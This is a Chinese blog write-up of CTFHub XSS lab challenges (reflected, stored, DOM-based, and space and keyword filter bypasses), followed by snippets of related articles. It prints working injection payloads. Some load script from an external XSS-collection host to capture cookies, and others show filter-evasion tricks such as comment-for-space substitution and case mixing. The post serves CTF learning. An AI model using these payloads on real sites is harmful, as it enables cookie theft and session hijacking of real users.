CTFhub之xss漏洞

于 2024-05-15 22:52:56 发布
阅读量642 收藏 10
点赞数 19
文章标签: xss web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46954909/article/details/138920476
版权

前期了解:上半部分是用户执行的操作,下半部分是模拟服务器的操作。

一:反射型xss。

先在用户框里继续测试,<script>alert(1)</script>,然后就发现了存在xss漏洞。

测试看看有没有cookie返回,<script>alert(document.cookie)</script>,但发现并不存在cookie,所以可以确认用户执行操作是不携带cookie的。

于是我们可以利用xss平台进行利用,让服务器将请求的信息发给xss平台。

最后在xss平台上获取到cookie了。

二:存储型xss。

先在用户执行框输入<script>alert(1)</script>,测试是否存在xss漏洞。

发现是存在xss漏洞的,于是我们就可以测试去注入了。

发现用户执行是不会携带cookie的,所以只能让服务器返回cookie。

所以我们就要配合xss平台获取cookie。

因为我们知道用户执行是不会返回cookie的,所以我们将用户执行的网页让服务器去执行。

然后我就可以在xss平台上看到一条携带cookie的信息啦。

第三题:DMO反射。

先进行测试,<script>alert(1)</script>,发现攻击不成功,而返回的是;。所以推测这可以使用点击促发函数,然后我们观察源码可以知道,需要先闭合,再执行<img src=0 οnclick=alert("xss")>,所以最终的payload为'><img src=0 οnclick=alert("xss")>

我们用到xss平台来接收cookie,构造语句: '></script><script src=x οnerrοr=s=createElement('script');body.appendChild(s);s.src='//uj.ci/0nk';></script>

最后在xss平台上得到cookie值

第四题:DOM跳转

首先我们用户的输入框被禁止输入了,但他给我们知道了他的变量名,所以我们就可以考虑看看是否能进行GETxss注入,使用常规的http代码无法成功,所以可以考虑使用js。

确认存在漏洞后我们就可以直接利用xss平台进行,xss注入了。然后我们就简单了解一下 ,getScritp()

第五题:过滤空格

常规注入,发现是可以的。

然后使用xss平台,发现失败,没有收到信息,所以我们查看源码,原来是过滤空格。<sCRiPt sRC=//uj.ci/0nk></sCrIpT>

所以我们想办法绕过空格。

例如注释绕过。/**/

然后就可以接收到数据,说明成功。之后就是重复之前的步骤啦。

补充:除了/**/外,还可以使用//等,+号可不可以?可不可以?空格编码可不可以?只能慢慢测试啦。

第六题:过滤关键词

常规测试

然后发现script给过滤了,不仅如此img等也进行了过滤,这就不演示了。

于是我们就尝试去绕过,试试大小写转化,成了,那么这题就可以结束了,因为我们的xss平台本来就自带大小写转换。

除了使用大小写转换,还可以使用双写等等,其他具体的可去探索。

安全检测中
关注
  • 19
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSP安全开发之XSS漏洞详解
10-21
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户...
JSP使用过滤器防止Xss漏洞
10-17
Web开发中,XSS(Cross-site scripting)漏洞是一种常见的安全威胁,允许攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。JSP(JavaServer Pages)作为常用的服务器端动态网页技术,同样需要关注XSS...
CTFSHOW XSS漏洞
qq_61553520的博客
04-20 290
这篇文章记录了我刷题的过程,是ctf.show上的XSS漏洞,第316-第333。
《从0到1:CTFer成长之路》XSS漏洞
weixin_43072923的博客
12-17 2963
《从0到1:CTFer成长之路》XSS漏洞
CTFHub——XSS
2302_79119987的博客
03-28 868
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
CTFHubXSS漏洞_反射型
Mitchell_Donovan的博客
04-20 988
CTFHub_反射型XSS 原题链接 key:反射型XSS的注入与利用 ①原题界面如下???? 简单地尝试一下有无反射型XSS漏洞,在第一个框内提交以下XSS弹窗语句???? <script>alert(1)</script> 发现成功弹窗,说明存在XSS漏洞 ②登陆平台XSSplatform,创建新项目???? 进行相关配置???? ③查看项目代码???? 这都不重要,在底部找到使用方法???? ④把其中一条攻击代码复制下
CTF学习笔记——XSS攻击
Obs_cure的博客
08-02 9429
一、XSS原理 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。[1]百度百科 HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,与之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签
CTFweb方向的XSS
cutesharkl的博客
07-13 665
XSS概述:XSS是一种Web安全漏洞,它允许攻击者将恶意脚本注入到受害者的Web应用程序中,从而在用户的浏览器中执行该脚本。这种攻击可以导致各种问题,包括窃取用户登录凭据、会话劫持、网页篡改等。
百度编辑器解决xss漏洞
03-01
百度编辑器解决xss漏洞
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
XSS20关练习源码
09-04
包含20关XSS练习的源码。文件都为PHP类型,下载个phpstudy就可以搭建起来了。我已经通过了,所以共享出来给大家练习。
XSS漏洞原理详解丨小白WEB安全入门
jennycisp的博客
06-27 1876
XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。在检测的开始,可以输入一些敏感字符,比如“、()”等,提交后查看网页源代码的变化以发现输入被输出到什么地方,且可以发现相关敏感字符是否被过滤。
[ctfhub]-xss详解
weixin_52116519的博客
04-28 4901
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射型XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
ctfhubxss
小宇的web博客
05-22 1624
ctfhubxss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
ctfhub-技能树-xss题集全部习题详解-最新
weixin_73562787的博客
08-10 3182
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
CTFHUB------XSS
qq_45616570的博客
06-23 720
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top: categories: CTFHUB刷题 tags: 网络安全 CTFHUB CTFHUB------XSS 反射型xss 题目 解题思路 题目是xss反射型 xss反射型是将变量的值换成xss的payload flag在cookie中,利用xss平台进行获取flag 解题过程 1.创建xss平台项目 2.点击下一步,勾选默认模块 3.点击下图中的一个作为反射型的变量值 4.返回题.
CTFHUB-技能树-Web题-XSS-反射型
最新发布
Static______的博客
04-11 1255
参考链接:https://blog.csdn.net/weixin_43486981/article/details/107974878。特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话。输入admin后,会在页面显示,猜测可以通过该输入,改变页面内容。根据提示,把XSS平台给出的代码复制到第一个输入框中进行注入。提交后,在第二个框中访问第一个框注入XSS脚本后的网址。XSS platform平台,在上面注册一个账号。提交后,在XSS平台查看注入结果。
ctfhub xss
09-19
引用和引用[2]中提到的CTFHUB-XSS是一种攻击技术,通过构造恶意链接或在存在XSS漏洞的地方注入恶意脚本来获取用户的cookie信息。攻击者可以通过诱使受害者点击带有恶意脚本的链接,从而在自己搭建的XSS平台上记录下受害者的cookie信息。 引用中提到了获取cookie的方法,其中一种方法是在存在XSS漏洞的搜索栏中输入恶意脚本,但这种方法只能在受害用户的浏览器中弹出cookie,攻击者无法直接获得。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值